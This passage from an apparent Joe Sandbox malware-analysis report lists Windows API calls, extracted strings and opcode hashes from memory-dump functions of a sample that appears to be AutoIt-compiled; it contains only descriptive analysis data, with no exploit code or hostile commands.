                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0048AFD5
                                                              • _wcscmp.LIBCMT ref: 0048AFE5
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0048B00C
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0048B055
                                                              • _wcscmp.LIBCMT ref: 0048B065
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0048B08D
                                                              • GetWindowRect.USER32(00000004,?), ref: 0048B0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              • API String ID: 1788623398-1539354611
                                                              • Opcode ID: c590f5ff23737a5459203e41aea92f1bd88a7162374850cd9de9ce6a106fee1a
                                                              • Instruction ID: 479b7c4ae9b000dd46d838348d72eaf7357b356d35a8f8533c4cc8a1a3f2d95c
                                                              • Opcode Fuzzy Hash: c590f5ff23737a5459203e41aea92f1bd88a7162374850cd9de9ce6a106fee1a
                                                              • Instruction Fuzzy Hash: 0A81B0710082059FDB01EF15C885BAF7BD8EF44358F04896BFE858A196DB38DD49CBA9
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 004BC627
                                                                • Part of subcall function 004BAB37: ClientToScreen.USER32(?,?), ref: 004BAB60
                                                                • Part of subcall function 004BAB37: GetWindowRect.USER32(?,?), ref: 004BABD6
                                                                • Part of subcall function 004BAB37: PtInRect.USER32(?,?,004BC014), ref: 004BABE6
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004BC690
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004BC69B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004BC6BE
                                                              • _wcscat.LIBCMT ref: 004BC6EE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004BC705
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004BC71E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 004BC735
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 004BC757
                                                              • DragFinish.SHELL32(?), ref: 004BC75E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004BC851
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbO
                                                              • API String ID: 169749273-2135428632
                                                              • Opcode ID: bc4461f4fc9e48f33f3ad92979c0453bab4e0f687a04ad8c65b905e1e940e4fe
                                                              • Instruction ID: 75ad52eee72d67467a2ddb14166423d9963d83c8d367cf83c084f43e28bf6b41
                                                              • Opcode Fuzzy Hash: bc4461f4fc9e48f33f3ad92979c0453bab4e0f687a04ad8c65b905e1e940e4fe
                                                              • Instruction Fuzzy Hash: A4617E71108301AFC701EF65CC85EAFBBE8EF88314F400A2FF595921A1DB749909CB6A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              • API String ID: 1038674560-1810252412
                                                              • Opcode ID: 8f45d2128f6a06d3eb9297e16753e489da88307d5bf4f1143f9e9dc64ed751a8
                                                              • Instruction ID: f17064d7e02f5123ab1ecb655e95b1f53bf92a18fc00a1f051b45dea51263369
                                                              • Opcode Fuzzy Hash: 8f45d2128f6a06d3eb9297e16753e489da88307d5bf4f1143f9e9dc64ed751a8
                                                              • Instruction Fuzzy Hash: 8B31E670948209A6EA10FA52DE03FAE77A4AF1472AF30082FF441710D2EF9D6F14C65E
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 004A5013
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004A501E
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 004A5029
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 004A5034
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004A503F
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 004A504A
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 004A5055
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 004A5060
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 004A506B
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 004A5076
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 004A5081
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 004A508C
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 004A5097
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004A50A2
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004A50AD
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 004A50B8
                                                              • GetCursorInfo.USER32(?), ref: 004A50C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$Info
                                                              • String ID:
                                                              • API String ID: 2577412497-0
                                                              • Opcode ID: 2d82b1997b0c2db934e186bf00edad8b971beac6602514bb574a5577a27afed6
                                                              • Instruction ID: 8ea8995f252440c5e35d25459b5201f1fadf388d95211cb73d74f5f6de2a797b
                                                              • Opcode Fuzzy Hash: 2d82b1997b0c2db934e186bf00edad8b971beac6602514bb574a5577a27afed6
                                                              • Instruction Fuzzy Hash: 243112B1D083196ADF109FB68C8996FBFE8FF14750F50453BA50CE7281DA78A5048F95
                                                              APIs
                                                              • _memset.LIBCMT ref: 004BA259
                                                              • DestroyWindow.USER32(?,?), ref: 004BA2D3
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004BA34D
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004BA36F
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004BA382
                                                              • DestroyWindow.USER32(00000000), ref: 004BA3A4
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00430000,00000000), ref: 004BA3DB
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004BA3F4
                                                              • GetDesktopWindow.USER32 ref: 004BA40D
                                                              • GetWindowRect.USER32(00000000), ref: 004BA414
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004BA42C
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004BA444
                                                                • Part of subcall function 004325DB: GetWindowLongW.USER32(?,000000EB), ref: 004325EC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                              • String ID: 0$tooltips_class32
                                                              • API String ID: 1297703922-3619404913
                                                              • Opcode ID: ea35ab72e6555ddd0b43c576d3da3e1d36d8c093fb0f0acb845192cac5a86570
                                                              • Instruction ID: 2536100a1a3c640947b8f019ab7b3f885c2d4982e736a70032ad0b8d992ef3fa
                                                              • Opcode Fuzzy Hash: ea35ab72e6555ddd0b43c576d3da3e1d36d8c093fb0f0acb845192cac5a86570
                                                              • Instruction Fuzzy Hash: 88719E70140205AFD721DF18CC49FA77BE5FB88304F04452EF985872A0DBB8E926CB6A
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004B4424
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004B446F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: 64f0386dfac72ab97d9a8020b9cc515bbcac2b9ccdb10bbe47d13cc124235f33
                                                              • Instruction ID: 6bce17250ec8167e3d9bddfbfe18bfc5a6dd2d8690d2a1905a18f8f222205f9d
                                                              • Opcode Fuzzy Hash: 64f0386dfac72ab97d9a8020b9cc515bbcac2b9ccdb10bbe47d13cc124235f33
                                                              • Instruction Fuzzy Hash: 529192742007019FCB14EF15C451A6EB7E1AF95358F04886EF8965B3A3CB78ED0ACB59
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004BB8B4
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004B91C2), ref: 004BB910
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004BB949
                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004BB98C
                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004BB9C3
                                                              • FreeLibrary.KERNEL32(?), ref: 004BB9CF
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004BB9DF
                                                              • DestroyIcon.USER32(?,?,?,?,?,004B91C2), ref: 004BB9EE
                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004BBA0B
                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004BBA17
                                                                • Part of subcall function 00452EFD: __wcsicmp_l.LIBCMT ref: 00452F86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                              • String ID: .dll$.exe$.icl
                                                              • API String ID: 1212759294-1154884017
                                                              • Opcode ID: 5a0d89538a11230e3efa3c52dd2215e2f0b6e82df200b9e456a8eac01380de2f
                                                              • Instruction ID: 6b580ecac9b7349c9cb7e81bd87f801347b13b52f723dee0168cdfa98251b704
                                                              • Opcode Fuzzy Hash: 5a0d89538a11230e3efa3c52dd2215e2f0b6e82df200b9e456a8eac01380de2f
                                                              • Instruction Fuzzy Hash: 3361CEB1900205BAEB14DF65CC41BFE77A8FB08711F10461BF915D61C1DBB8A984DBA8
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 0049DCDC
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0049DCEC
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0049DCF8
                                                              • __wsplitpath.LIBCMT ref: 0049DD56
                                                              • _wcscat.LIBCMT ref: 0049DD6E
                                                              • _wcscat.LIBCMT ref: 0049DD80
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0049DD95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDA9
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDDB
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DDFC
                                                              • _wcscpy.LIBCMT ref: 0049DE08
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0049DE47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: de097244591e4d98f73f76270a53f12414223f00b53c8d2cad539a006dfae625
                                                              • Instruction ID: f0763abd8df5748c415b3a4ff348d3ec72e6b1739459b8ddb78ac8a82087aade
                                                              • Opcode Fuzzy Hash: de097244591e4d98f73f76270a53f12414223f00b53c8d2cad539a006dfae625
                                                              • Instruction Fuzzy Hash: CE616C725042059FCB10EF61C8849AFB7E8FF89314F04492EF989C7251DB79E949CB9A
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00499C7F
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00499CA0
                                                              • __swprintf.LIBCMT ref: 00499CF9
                                                              • __swprintf.LIBCMT ref: 00499D12
                                                              • _wprintf.LIBCMT ref: 00499DB9
                                                              • _wprintf.LIBCMT ref: 00499DD7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LoadString__swprintf_wprintf$_memmove
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                              • API String ID: 311963372-3080491070
                                                              • Opcode ID: 593eff45f46a73993ef8d003e968f6807d1b0139a5ce7a360432da52b941a28a
                                                              • Instruction ID: 38cab5eab740123b1d881cedff25dcd0ea52b9e1a311b45fe4439489bad17547
                                                              • Opcode Fuzzy Hash: 593eff45f46a73993ef8d003e968f6807d1b0139a5ce7a360432da52b941a28a
                                                              • Instruction Fuzzy Hash: A651A471900509AACF15EBE5CD46EEEBB78AF08305F20016FF505721A2EB392F59CB59
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • CharLowerBuffW.USER32(?,?), ref: 0049A3CB
                                                              • GetDriveTypeW.KERNEL32 ref: 0049A418
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A460
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A497
                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0049A4C5
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                              • API String ID: 2698844021-4113822522
                                                              • Opcode ID: 556f92ee365df9055bb0f57eededa0b82d64897cf20c5afd51811aeb6f5b0e31
                                                              • Instruction ID: 2b8b275afd4dbf873d5921b2b5e04b2bd7ea0d7fd9a35abb55173920f5fd41dd
                                                              • Opcode Fuzzy Hash: 556f92ee365df9055bb0f57eededa0b82d64897cf20c5afd51811aeb6f5b0e31
                                                              • Instruction Fuzzy Hash: 3E518FB11143059FCB10EF12C88196BB7F4EF98718F10886EF89957251DB79ED09CB8A
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0046E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0048F8DF
                                                              • LoadStringW.USER32(00000000,?,0046E029,00000001), ref: 0048F8E8
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0046E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0048F90A
                                                              • LoadStringW.USER32(00000000,?,0046E029,00000001), ref: 0048F90D
                                                              • __swprintf.LIBCMT ref: 0048F95D
                                                              • __swprintf.LIBCMT ref: 0048F96E
                                                              • _wprintf.LIBCMT ref: 0048FA17
                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0048FA2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                              • API String ID: 984253442-2268648507
                                                              • Opcode ID: 426184fd088f8de2ef193321b3b9959b43226ac7dc23c5779cf17c3c2e07d56b
                                                              • Instruction ID: 97ebd9df96d3ab0846bf371318d388fdc60a708638fb2906c119b8f4c71b2723
                                                              • Opcode Fuzzy Hash: 426184fd088f8de2ef193321b3b9959b43226ac7dc23c5779cf17c3c2e07d56b
                                                              • Instruction Fuzzy Hash: 614164B2800109AACF15FFE1DD46EEEB778AF18315F10146AF50572092EB396F09CB69
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004B9207,?,?), ref: 004BBA56
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA6D
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA78
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA85
                                                              • GlobalLock.KERNEL32(00000000), ref: 004BBA8E
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBA9D
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004BBAA6
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBAAD
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004B9207,?,?,00000000,?), ref: 004BBABE
                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004C2CAC,?), ref: 004BBAD7
                                                              • GlobalFree.KERNEL32(00000000), ref: 004BBAE7
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 004BBB0B
                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 004BBB36
                                                              • DeleteObject.GDI32(00000000), ref: 004BBB5E
                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004BBB74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                              • String ID:
                                                              • API String ID: 3840717409-0
                                                              • Opcode ID: c04e8c051f16174370c94e140919dcd64c42ec636424765b2285e6dd31d3edcf
                                                              • Instruction ID: 9f0fdafda148e7cce57fdd39a08c18a46a67a4f6558fd4795515287a9bdc703b
                                                              • Opcode Fuzzy Hash: c04e8c051f16174370c94e140919dcd64c42ec636424765b2285e6dd31d3edcf
                                                              • Instruction Fuzzy Hash: 60415775600208FFDB119F69DC88EABBBB8FB89711F104169F90AD7260C774AE05CB64
                                                              APIs
                                                              • __wsplitpath.LIBCMT ref: 0049DA10
                                                              • _wcscat.LIBCMT ref: 0049DA28
                                                              • _wcscat.LIBCMT ref: 0049DA3A
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0049DA4F
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DA63
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0049DA7B
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0049DA95
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0049DAA7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                              • String ID: *.*
                                                              • API String ID: 34673085-438819550
                                                              • Opcode ID: 3840be858e9b721e71c8f95fb15e2032d682e63d3e6dfd021b8c1ccc694b39a3
